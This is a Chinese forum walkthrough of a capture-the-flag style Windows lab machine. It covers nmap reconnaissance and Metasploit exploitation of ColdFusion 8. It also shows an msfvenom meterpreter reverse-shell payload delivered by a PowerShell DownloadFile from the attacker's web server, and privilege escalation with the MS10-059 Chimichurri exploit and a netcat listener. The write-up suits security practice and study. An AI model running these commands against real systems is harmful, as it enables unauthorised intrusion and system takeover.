用户
搜索
  • TA的每日心情
    奋斗
    2021-2-25 10:34
  • 签到天数: 123 天

    连续签到: 2 天

    [LV.7]常住居民III

    i春秋-核心白帽

    Rank: 4

    57

    主题

    76

    帖子

    2696

    魔法币
    收听
    0
    粉丝
    9
    注册时间
    2020-7-23
    发表于 2021-2-8 20:59:48 59944
    0x00:靶机介绍
    这次的靶机是windows靶机。建议用MSF做前期的getshell,这样方便点。提权部分可能要手工编造PowerShell脚本传文件。
    0.png
    0x01:信息收集
    还是先用nmap进行一波端口探测,终于遇到一个没80端口的了。。。。
    命令:nmap -A -sS -sV -v -p- 10.10.10.11
    1.png
    这里只能慢慢一个一个查,8500端口是唯一能正常访问的。
    2.png
    那么逐一访问两个文件夹里面的内容一直到/CFIDE/administrator发现一个正常的WEB登录页面
    3.png
    0x02:利用MSF get shell
    遇事不决问MSF,然而一搜就发现太多payload了。。。
    4.png
    那只能先进入MSF 找到一个扫描版本的payload。这样可以缩短查找范围
    5.png
    那么使用该payload,设置好参数以后run,成功得知版本为8
    6.png
    缩短范围后,可以确定我们这次要用的payload是这个MSF自带的。
    7.png
    然而裂开了,第一次卡BUG卡在设置payload好久。。。之后问问大佬,结果要设置延迟时间行吧把。行吧我们去到payload那里改,把5改为30
    8.png

    此时重启波MSF使用exploit/windows/http/coldfusion_fckeditorpayload。设置波参数成功得到一个普通用户shell。
    命令:set RHOSTS 10.10.10.11
           SetRPORT 8500
           SetLHOST 10.10.14.5
           SetLPORT 5555
           run
    9.png
    顺便去到tolis/desktop得到flag。
    10.png
    0x03:添加shell
    虽然我们拿到了shell,但提权对于我这种菜鸡来说还是太难了。需要用到MSF的local_exploit_suggester。我们需要在MSF下再拿一个shell运行它。所以需要先制作一个小exe的马
    命令:msfVENOM -pwindows/x64/meterpreter_reverse_tcp LHOST=10.10.14.5 LPORT=5555 -f exe>shell1.exe
    11.png
    然后打开我们的python3共享模式
    命令: python -m http.server 8082 此时在我们的靶机上要把exe给下载过来。属实折磨我,毕竟Linux跟Windows是不一样的研究了一下传输命令是这样的需要用到PowerShell,去网上找了个模板套了一下变成以下命令,成功把shell1.exe传过来了。命令: PowerShell (new-object Net.WebClient).DownloadFile('http://10.10.14.5:8082/shell1.exe','c:\Users\tolis\Desktop\shell1.exe') 12.png
    同时启动MSF,用exploit/multi/handler payload,注意这里一定要设置payload为windows/x64/meterpreter_reverse_tcp。这里在靶机上运行shell1.exe成功进入meterpreter。这时候我们同时有2个shell了。 13.png
    0x04:利用辅助得到可利用的漏洞信息
    关于windows靶机提权有2种方法第一种是利用MSF获得shell以后要使用到自带神器local_exploit_suggester。可以看到有3个可以利用的。据大佬说这3个都可以利用。
    命令:ctrl+z Y 退出meterpreter回到background界面
           usepost/multi/recon/local_exploit_suggester
           setsession n
           run
    14.png
    另外一种方法是有一个用神器windowexploitsuggester,比MSF扫出的多点。准确性嘛emmmm,最后决定用MS10-059(如果不会用的话可以看这篇文章https://blog.csdn.net/weixin_45650977/article/details/112554489)
    19.png
    经过逐一筛选可确定是MS10-059有个payload在github页面https://github.com/Re4son/Chimichurri
    15.png
    0x05:提权
    然而由于不知道啥原因。大佬随便用MSF选那3个检测的洞随随便便就能搞定。而我各种线程注入,钻来钻去都失败了。重启靶机n次都不行。只能用powershell脚本把我的Chimichurri.exe下载传过来。然后再慢慢弄。这里演示波如果我没用MSF添加shell时,如何方便传文件。
    这是最终版powershell脚本,windows上echo跟Linux echo一样同样可以写入文件里面。
    这里解析一波,如果我说的不对请多多包容
    首先我们要创建一个WebClient对象(New-Object System.Net.WebClient)然后赋值給变量$webclient。
    接着定义好我们要用python共享的端口和文件(注意一定要对大小写特别敏感,GitHub上下载下来的是Chimichurri.exe,而我这里写的是chimichurri.exe,我还疑惑了好久到底是哪出问题了)。然后指定接收后的文件改名为exploit.exe。而后面的WebClient.DownloadFile就是把将具有指定URL的文件下载到靶机上。最后开始用powershell.exe执行。这是菜鸟脚本而已。实在不行就在MSF添加shell以后上传也行。
    16.5.png
    然后在靶机上执行,记得提前开启波Nc反弹
    17.png
    成功变为最高级权限。
    18.png

    公众号:神隐(咸鱼)攻防实验室希望各位大佬能关注一波
    感谢分享
    使用道具 举报 回复
    大佬牛批
    使用道具 举报 回复
    楼主 牛皮
    使用道具 举报 回复
    发表于 2021-2-19 16:20:47
    楼主 牛皮
    使用道具 举报 回复
    发表于 2021-2-19 16:26:47
    楼主牛批
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册